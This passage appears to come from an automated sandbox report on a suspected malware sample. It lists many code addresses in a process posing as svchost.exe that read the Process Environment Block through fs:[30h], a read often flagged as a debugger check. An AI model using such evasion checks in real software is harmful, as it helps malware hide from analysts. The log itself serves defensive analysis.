Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]	1_2_0314C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]	1_2_03162674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]	1_2_031F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]	1_2_0316A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]	1_2_03134690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]	1_2_031666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0316C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0316A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_031AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]	1_2_031B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]	1_2_031C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]	1_2_03204500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]	1_2_03140535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]	1_2_0315E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]	1_2_03138550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]	1_2_0316656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]	1_2_0316E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]	1_2_03132582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]	1_2_03164588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]	1_2_031545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]	1_2_031B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]	1_2_031365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0316A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]	1_2_0316E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0315E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]	1_2_031325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]	1_2_0316C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]	1_2_03168402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]	1_2_0312E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]	1_2_0312C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]	1_2_031B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]	1_2_031EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312645D mov eax, dword ptr fs:[00000030h]	1_2_0312645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315245A mov eax, dword ptr fs:[00000030h]	1_2_0315245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h]	1_2_0316E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h]	1_2_0315A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h]	1_2_031BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h]	1_2_031EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h]	1_2_031644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_031BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031364AB mov eax, dword ptr fs:[00000030h]	1_2_031364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h]	1_2_031304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]	1_2_03204B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]	1_2_03128B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]	1_2_031DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]	1_2_031D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]	1_2_0312CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_031DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]	1_2_0315EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_031BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]	1_2_031BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]	1_2_0316CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]	1_2_0315EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]	1_2_031DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]	1_2_03168A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]	1_2_03204A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]	1_2_03186AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]	1_2_03130AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]	1_2_031BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]	1_2_031B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]	1_2_031C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]	1_2_031B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]	1_2_03204940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]	1_2_031BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
